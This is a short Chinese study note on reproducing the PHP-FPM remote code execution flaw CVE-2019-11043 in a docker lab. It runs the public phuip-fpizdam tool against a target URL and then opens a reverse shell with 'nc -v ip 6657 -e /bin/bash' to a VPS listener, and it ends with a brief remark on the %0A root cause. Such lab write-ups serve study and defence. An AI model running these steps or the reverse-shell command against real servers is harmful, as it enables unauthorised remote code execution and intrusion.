2019-10-31 PHP-FPM 远程代码执行漏洞（CVE-2019-11043）学习

在使用一些有错误的Nginx配置的情况下，通过恶意构造的数据包，即可让PHP-FPM执行任意代码。

了解一下PHP-FPM：

       PHP-FPM(FastCGI Process Manager：FastCGI进程管理器)是一个PHPFastCGI管理器用于管理PHP 进程池的软件，用于接受web服务器的请求。PHP-FPM提供了更好的PHP进程管理方式，可以有效控制内存和进程、可以平滑重载PHP配置。php-fastcgi 只是一个cgi程序,只会解析php请求，并且返回结果。

漏洞的复现：

简单利用

利用作者的工具复现，需要go环境。

go环境配置参考：https://blog.csdn.net/Fly_hps/article/details/81073316

作者工具使用参考：https://github.com/neex/phuip-fpizdam

环境配置完成：

利用“go get github.com/neex/phuip-fpizdam” 下载作者工具到kali。进入到“github.com/neex/phuip-fpizdam” 中输入命令：go run . http://your-ip:8080/index.php

进入网页进行验证，因为FPM会产生多个进程，该漏洞会污染数个进程，有可能第一次访问可能不会有改变，需要进行多次访问，得到显示结果。

反弹shell

尝试进行反弹shell，在vps中进行监听

因为复现的环境不存在nc等反弹的命令，需要进入环境内进行安装。执行docker ps 查看php的ID，再执行docker exec -it ID bash 可进入环境内执行命令。

在环境内安装nc即可。如图nc已安装完毕：

尝试在网页中进行nc反弹shell，输入nc -v ip 6657 -e /bin/bash可以连接到vps并执行命令。

漏洞原理解析：

在Nginx的特殊配置下出发该漏洞：

插入%0A可破坏正则匹配导致下溢出，破坏了split_path_info。

至于漏洞利用的思路还有待研究。